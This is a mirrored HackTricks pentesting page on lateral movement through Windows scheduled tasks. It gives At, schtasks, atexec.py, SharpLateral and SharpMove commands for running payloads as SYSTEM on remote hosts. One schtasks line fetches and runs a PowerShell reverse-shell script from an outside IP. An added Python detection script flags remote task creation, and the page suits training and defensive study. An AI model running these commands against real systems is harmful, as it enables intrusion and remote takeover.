mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
AtExec / SchtasksExec
How does it work
At lets you schedule tasks on hosts where you know the username and the password or hash. You can therefore use it to execute commands on other hosts and get the output.
At \\victim 11:00:00PM shutdown -r
With schtasks, you first need to create the task and then run it:
schtasks /create /tn <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
schtasks /run /tn <TASK_NAME> /S <VICTIM>
schtasks /create /S dcorp-dc.domain.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1'')'"
schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local
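For detection, the create-then-run pattern above can be picked out of process-creation command lines (for example Event ID 4688 or Sysmon Event ID 1). The following Python triage is an added example, not part of the original page or of any tool it names; the sample lines, host names, task names and the risk heuristics are constructed assumptions.

```python
import re

TOKEN = re.compile(r'"[^"]*"|\S+')            # keep quoted arguments as one token
SYSTEM = {"system", "nt authority\\system"}
RISKY_TR = re.compile(r"\b(powershell|cmd|wscript|cscript|mshta|rundll32)(\.exe)?\b"
                      r"|\\(temp|users|programdata)\\", re.I)  # assumed heuristics

def parse_schtasks(cmdline):
    """Return {switch: value} for a schtasks command line, None for other processes."""
    tokens = TOKEN.findall(cmdline)
    if not tokens or not re.search(r"schtasks(\.exe)?$", tokens[0].strip('"'), re.I):
        return None
    args = {}
    for tok, nxt in zip(tokens[1:], tokens[2:] + ["/"]):
        if tok.startswith("/"):  # a switch; its value is the next non-switch token
            args[tok.lower()] = "" if nxt.startswith("/") else nxt.strip('"')
    return args

def triage(cmdlines):
    """Flag remote task creation and note a later /run of the same task on that host."""
    created, findings = {}, []
    for line in cmdlines:
        a = parse_schtasks(line)
        if a is None or "/s" not in a:
            continue  # not schtasks, or a purely local task
        key = (a["/s"].lower(), a.get("/tn", "").lower())
        if "/create" in a:
            reasons = ["remote-create"]
            if a.get("/ru", "").lower() in SYSTEM:
                reasons.append("runs-as-system")
            if RISKY_TR.search(a.get("/tr", "")):
                reasons.append("risky-action")
            created[key] = reasons
            findings.append((key, reasons))
        elif "/run" in a and key in created:
            created[key].append("run-on-demand")  # create followed by an immediate run
    return findings

# Constructed sample command lines (hosts, task names and paths are made up).
SAMPLE = [
    r'schtasks /create /tn "Backup" /tr C:\Tools\backup.exe /sc daily /st 02:00',
    r'schtasks /create /tn Upd /tr C:\Windows\Temp\u.exe /sc once /st 00:00 /S srv01 /RU System',
    r'schtasks /run /tn Upd /S srv01',
    r'schtasks.exe /create /S fs02 /SC Weekly /RU "NT Authority\SYSTEM" /TN "Inv" /TR "C:\Program Files\Inv\scan.exe"',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

Command-line telemetry only sees tasks created with schtasks.exe; on the target host, Security Event ID 4698 (a scheduled task was created) records the task regardless of which client created it, provided that audit subcategory is enabled.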
You can use Impacket's atexec.py to execute commands on remote systems using the AT command. This requires valid credentials (username and password or hash) for the target system.
atexec.py 'DOMAIN'/'USER':'PASSWORD'@'target_ip' whoami
You can also use SharpLateral:
SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName
You can use SharpMove:
SharpMove.exe action=taskscheduler computername=remote.host.local command="C:\windows\temp\payload.exe" taskname=Debug amsi=true username=domain\\user password=password
More information about the use of schtasks with silver tickets here.